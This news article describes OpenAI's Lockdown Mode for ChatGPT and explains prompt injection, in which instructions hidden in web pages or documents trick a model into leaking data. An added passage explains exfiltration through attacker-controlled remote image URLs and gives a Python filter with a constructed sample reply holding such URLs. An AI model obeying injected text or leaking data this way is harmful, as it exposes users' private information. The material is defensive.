OpenAI's new feature protects you from prompt injection attacks
What's the story
OpenAI has launched a new security feature, Lockdown Mode, to protect users from prompt injection attacks. This comes in response to the growing threat of such attacks against AI-powered assistant systems. The company describes the mode as an optional security setting aimed mainly at individuals and organizations that handle sensitive data and need stronger protection against data exfiltration attempts via malicious prompts.
Attack details
What are prompt injections?
Prompt injection attacks are a form of social engineering where attackers embed instructions in web pages, documents or other content processed by AI systems. These instructions are meant to trick an AI model into revealing information or performing unintended actions. OpenAI says Lockdown Mode is a final layer of defense on top of the protections already built into ChatGPT, its AI models and backend infrastructure.
User impact
Limitations of Lockdown Mode
OpenAI has clarified that Lockdown Mode isn't for everyone. It is aimed at scenarios where security is prioritized over convenience and access to advanced features. When activated, the mode restricts several ChatGPT capabilities, such as retrieving images from the internet or displaying them in responses. The chatbot also can't download files for analysis, but users can still upload files directly for review.
Feature limitations
Deep Research and Agent Mode disabled
While Lockdown Mode is active, some advanced features like Deep Research and Agent Mode are completely disabled. However, the company has clarified that this feature doesn't prevent prompt injections from appearing in content processed by ChatGPT. Instead, it minimizes the risk of an attacker exploiting network requests or connected tools to extract sensitive information from a user's account.
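The restriction on retrieving and displaying remote images targets the channel described above: an image reference in a rendered reply causes the client to issue a network request, and an injected instruction can control what goes into that URL. As an added illustration (not OpenAI's code, and not how ChatGPT implements the setting), the Python below applies the same idea as an output filter over a constructed reply: image references that would trigger a fetch are blocked, local ones are kept.

```python
import re
from urllib.parse import urlparse

# Constructed sample reply. The remote image references stand in for
# content that arrived through a processed web page; rendering them would
# send the attacker-controlled query strings to an external host.
SAMPLE_REPLY = (
    "Summary of the page you shared:\n"
    "- Quarterly revenue grew 12%.\n"
    "![status](https://img.example.invalid/pixel.png?note=summary-of-private-chat)\n"
    '<img src="https://cdn.example.invalid/t.gif?x=1">\n'
    "Local diagram: ![diagram](/files/diagram.png)\n"
)

# Image syntaxes a client might render; group 1 is always the URL.
PATTERNS = (
    re.compile(r'!\[[^\]]*\]\(([^)\s]+)(?:\s+"[^"]*")?\)'),            # ![alt](url)
    re.compile(r'<img\b[^>]*\bsrc=["\']([^"\']+)["\'][^>]*>', re.I),  # <img src=...>
)

def is_remote(url):
    """True if rendering this URL would cause a network request.
    Protocol-relative URLs (//host/x) count; data: URLs do not."""
    p = urlparse(url)
    return bool(p.netloc) or p.scheme.lower() in ("http", "https")

def remote_image_urls(text):
    """List every image URL in the reply that would be fetched on render."""
    return [m.group(1) for pat in PATTERNS
            for m in pat.finditer(text) if is_remote(m.group(1))]

def lockdown_filter(text):
    """Replace remote image references with a marker.
    Returns (filtered_text, blocked_urls) so the block can be logged."""
    blocked = []

    def repl(m):
        url = m.group(1)
        if is_remote(url):
            blocked.append(url)
            return "[remote image blocked]"
        return m.group(0)  # local or inline image: leave untouched

    for pat in PATTERNS:
        text = pat.sub(repl, text)
    return text, blocked

if __name__ == "__main__":
    clean, blocked = lockdown_filter(SAMPLE_REPLY)
    print(clean)
    print("blocked:", blocked)
```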
Impact
What about enterprise environments?
OpenAI also said that Lockdown Mode doesn't affect conversation memory, file uploads, conversation sharing settings or whether conversations may be used to improve AI models. In enterprise environments, many of these controls remain configurable by workspace administrators. Along with this new feature, the company is also launching an active session manager for users to view devices and browsers currently signed into their account.